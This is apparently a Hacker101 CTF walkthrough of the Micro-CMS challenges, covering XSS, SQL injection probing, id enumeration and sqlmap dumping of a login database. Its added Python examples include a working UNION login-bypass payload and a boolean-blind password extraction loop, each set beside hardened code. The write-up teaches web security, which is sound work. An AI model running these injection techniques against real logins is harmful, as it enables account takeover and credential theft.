Hello everyone, let's solve some HackerOne (Hacker101) CTFs.
Trivial (easy): 1 flag.
Micro-CMS v1: 4 flags.
Micro-CMS v2: 3 flags.
Now let's solve them. If we collect 26 points we earn an invitation to a private program.
1. Trivial:
This is one of the easiest challenges.
So, let's have a look at the page source.
The page source references a background image. Let's open that image directly.
There we go: the flag is in the image. Done.
2. Micro-CMS v1
This is the basic challenge. It comes with four flags, and we have to find all four.
Let's create a new page and put an XSS payload in it.
Click CREATE and then go back to the home page. The home page renders the payload and gives us the flag.
So we have the first flag. For the second flag, open the "Testing" page.
Look at how the pages are indexed: page.php?id=1. Let's check for a SQL error by tampering with the id (for example, appending a single quote). The page view gives nothing, but the same id in the edit page throws a SQL error.
That is our second flag.
Now let's get more. The page ids are plain sequential numbers, so let's tamper with the id value and request other ids; that gets us this:
OK, that is flag 3. Now let's try for flag 4.
There is a button on the page. Let's inject JavaScript into it.
Save it, then look at the page source: the flag is in the source.
So we've got all four flags.
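The four findings above follow three patterns: user input echoed into HTML without escaping (flags 1 and 4), a page id concatenated into a SQL string so a stray quote breaks the query (flag 2), and sequential ids that let you request pages the index never links to (flag 3). The following is an added Python example, not the challenge's own code, of a toy CMS backed by in-memory SQLite that shows each vulnerable form next to its hardened form. The schema, page contents, and function names are assumptions made for the example.

```python
import html
import sqlite3

# Toy CMS modelled on the behaviour described for Micro-CMS v1. The schema,
# the page rows and the function names are assumptions for this example,
# not the challenge's actual code.


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT, listed INTEGER)")
    db.executemany("INSERT INTO pages VALUES (?, ?, ?, ?)", [
        (1, "Testing", "Hello", 1),
        (2, "Markdown Test", "**bold**", 1),
        (3, "Private Page", "not linked from the index", 0),  # constructed unlisted page
    ])
    return db


# --- Flags 1 and 4: page title / button text rendered straight into HTML ---
def render_title_vuln(title):
    # Whatever the user typed becomes markup, so <script> or onclick= runs.
    return "<h1>%s</h1>" % title


def render_title_safe(title):
    # Escaping turns < > & " ' into entities; the browser shows the text.
    return "<h1>%s</h1>" % html.escape(title, quote=True)


# --- Flag 2: page id concatenated into the SQL string ---
def get_page_vuln(db, page_id):
    # page_id is the raw string from ?id=; "1'" produces a syntax error
    # that the challenge surfaces on the edit page.
    row = db.execute("SELECT title FROM pages WHERE id=" + page_id).fetchone()
    return row[0] if row else None


def get_page_safe(db, page_id):
    # Validate the type first, then bind the value instead of splicing it.
    try:
        pid = int(page_id)
    except ValueError:
        return None
    row = db.execute("SELECT title FROM pages WHERE id=?", (pid,)).fetchone()
    return row[0] if row else None


def sql_error_on_quote(db):
    # The single-quote probe: returns the database error text if the id is
    # being concatenated, None if the quote was handled safely.
    try:
        get_page_vuln(db, "1'")
    except sqlite3.OperationalError as e:
        return str(e)
    return None


# --- Flag 3: the index lists some pages, but every id is reachable ---
def index_titles(db):
    return [r[0] for r in db.execute("SELECT title FROM pages WHERE listed=1 ORDER BY id")]


def enumerate_ids(db, max_id=10):
    # Walk the id space the way you would by hand in the browser.
    found = {}
    for i in range(1, max_id + 1):
        title = get_page_safe(db, str(i))
        if title is not None:
            found[i] = title
    return found


def hidden_pages(db, max_id=10):
    # Pages that exist but are not on the index: an authorisation gap, not
    # something input validation alone fixes.
    listed = set(index_titles(db))
    return {i: t for i, t in enumerate_ids(db, max_id).items() if t not in listed}


if __name__ == "__main__":
    db = make_db()
    print(render_title_vuln("<script>alert(1)</script>"))
    print(render_title_safe("<script>alert(1)</script>"))
    print("SQL error on quote:", sql_error_on_quote(db))
    print("unlisted pages:", hidden_pages(db))
```

Note that the fix for flag 3 is not in this block: parameterising the id stops the SQL error but still serves page 3 to anyone who asks for it, so the real fix is an ownership or visibility check on the page before rendering.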
3. Micro-CMS v2
This one is also fairly easy; it comes with three flags.
Let's go.
Here is the thing: we need to be admin to edit or add pages, so we need to find the username and password.
Now it's time for Burp Suite. Fire it up and intercept the traffic.
Here is the login page. Submit a random username and password.
This is our login request. Save the intercepted request to a text file, then fire up sqlmap against it to list all the databases.
sqlmap reads the saved request with -r; with --dbs it enumerates the databases, and --dump pulls out the table contents.
That gives us one flag and the login credentials.
Now log in with those credentials for the second flag.
For the third flag I went for the hint.
Based on the hint, I created an HTML page to get access.
Use that HTML page to get the third flag. And it's done.
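What sqlmap automates against the login form above, as an added Python example that is not the challenge's code: a toy admin login whose username is spliced into the query. It shows the UNION trick that makes the login accept a password we choose, the boolean oracle that leaks the stored password one character at a time (the blind technique sqlmap falls back on when it dumps a table), and the parameterised version that closes both. The table name, the stored credentials, the status messages and the query shape are assumptions made for the example.

```python
import hmac
import sqlite3
import string

# Toy admin login modelled on the login form described for Micro-CMS v2.
# Table name, stored credentials, status messages and query shape are
# assumptions for this example, not the challenge's actual code.

ALPHABET = string.ascii_lowercase + string.digits + "-_"  # no quote characters


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 'constructed-secret')")  # constructed
    return db


def login_vuln(db, username, password):
    # Username is spliced into the SQL string; the password is compared in
    # Python against whatever row the query hands back, and the two failure
    # cases return different messages.
    query = "SELECT password FROM admins WHERE username = '%s'" % username
    row = db.execute(query).fetchone()
    if row is None:
        return "unknown user"
    if row[0] != password:
        return "wrong password"
    return "ok"


def union_bypass(db):
    # Make the SELECT return a row we control: the stored password is never
    # consulted, so the login accepts the value we supplied in the UNION.
    return login_vuln(db, "' UNION SELECT 'x' -- ", "x")


def oracle(db, condition):
    # Boolean oracle: when the injected condition is true the admin row comes
    # back and the server moves on to the (failing) password check; when it
    # is false no row matches and we get "unknown user" instead.
    status = login_vuln(db, "admin' AND (%s) -- " % condition, "")
    return status == "wrong password"


def extract_password(db, max_len=40):
    # Boolean-based blind extraction of the stored password, one character
    # per position, driven entirely through the login form's two messages.
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            if oracle(db, "substr(password, %d, 1) = '%s'" % (pos, ch)):
                recovered += ch
                break
        else:
            break  # no candidate matched: end of the string
    return recovered


def login_safe(db, username, password):
    # Parameterised query (no splicing) plus a single generic failure message
    # and a constant-time comparison, so neither the UNION trick nor the
    # true/false oracle has anything to work with.
    row = db.execute("SELECT password FROM admins WHERE username = ?", (username,)).fetchone()
    if row is None or not hmac.compare_digest(row[0].encode(), password.encode()):
        return "invalid credentials"
    return "ok"


if __name__ == "__main__":
    db = make_db()
    print("union bypass:", union_bypass(db))
    print("recovered password:", extract_password(db))
    print("same payload against the fixed login:", login_safe(db, "' UNION SELECT 'x' -- ", "x"))
```

The two failure messages are the part worth noticing: even after the query is parameterised, telling "unknown user" apart from "wrong password" is a username-enumeration oracle, which is why login_safe collapses both into one response.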
HAPPY HACKING….
PEACE….✌️✌️✌️